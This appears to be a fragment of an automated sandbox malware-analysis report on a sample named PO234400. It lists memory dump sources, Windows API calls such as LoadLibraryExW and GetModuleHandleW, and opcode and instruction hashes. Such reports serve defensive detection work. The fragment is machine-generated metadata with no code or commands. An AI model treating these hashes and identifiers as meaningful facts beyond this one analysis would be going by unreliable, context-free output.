                                                    • Instruction Fuzzy Hash: 6D21C4B59002499FDB10CFAAD884ADEFFF9FB48310F14845AE954A3350D378A954CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0691C85A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: fa18f7d4fa6d86fb4e99fb6ac3e01882f886d9934ca04d6cd084e7b4c70f610f
                                                    • Instruction ID: f60c5b25edc3900022b554278269349bf2904dbac2b4f78b9c101003d240b51d
                                                    • Opcode Fuzzy Hash: fa18f7d4fa6d86fb4e99fb6ac3e01882f886d9934ca04d6cd084e7b4c70f610f
                                                    • Instruction Fuzzy Hash: 4611E4B6D003498FDB10CF9AC484ADEFBF8AB89710F20842ED519A7610C779A545CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

Control-flow Graph
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0691C274), ref: 0691C4AE
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2611001531.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6910000_PO234400.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 43eff9b1243faec42d9ff68f09971144ba41ecd31c2260f1996406d8981e6926
                                                    • Instruction ID: 2b0fb7dfc9d6e66cf949c7ce88b7802a62c31635cf615bee83e7ab358211b2bd
                                                    • Opcode Fuzzy Hash: 43eff9b1243faec42d9ff68f09971144ba41ecd31c2260f1996406d8981e6926
                                                    • Instruction Fuzzy Hash: 391102B5C04349CFDB10DF9AC444BEEFBF4EB88214F20841AD519A7650C379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607170773.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_15ad000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d07116e2ccfb95790203b0ad8b30cc34d145a6f9155f6bf4a120a344010b31fc
                                                    • Instruction ID: 01d636641c4dacb121fc900bc14311015495d40728de068f27854c37049b0abe
                                                    • Opcode Fuzzy Hash: d07116e2ccfb95790203b0ad8b30cc34d145a6f9155f6bf4a120a344010b31fc
                                                    • Instruction Fuzzy Hash: 65214275284300DFDB10EF64D884B2ABBB1FB88314F60C96DD80A0F682D33AC407CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607170773.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_15ad000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3f63bd1e8f23bdce96bd7a7a19a865803ae1361a2bb2f3ec4fa3663416eac71
                                                    • Instruction ID: 88d5e63051f788631368807e32aac081c72f5da5a316e618808fc9f31403b15f
                                                    • Opcode Fuzzy Hash: c3f63bd1e8f23bdce96bd7a7a19a865803ae1361a2bb2f3ec4fa3663416eac71
                                                    • Instruction Fuzzy Hash: 8021A1755493808FCB03DF24D990719BF71FB46214F28C5EAD8498F6A7C33A980ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2607116396.000000000159D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0159D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_159d000_PO234400.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 679b9486f5dbbb28dee72361c1236369dd800c56e464452b8f87f5ed2b0ed9a5
                                                    • Instruction ID: fd7f37e4e1b729ddcf527964a9877b4580095d510a9789dcc028b9963f68027e
                                                    • Opcode Fuzzy Hash: 679b9486f5dbbb28dee72361c1236369dd800c56e464452b8f87f5ed2b0ed9a5
                                                    • Instruction Fuzzy Hash: 49F06271404344AEEB108E1AD884B66FFA8EB45635F18C45AED4C4E297C379A844CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%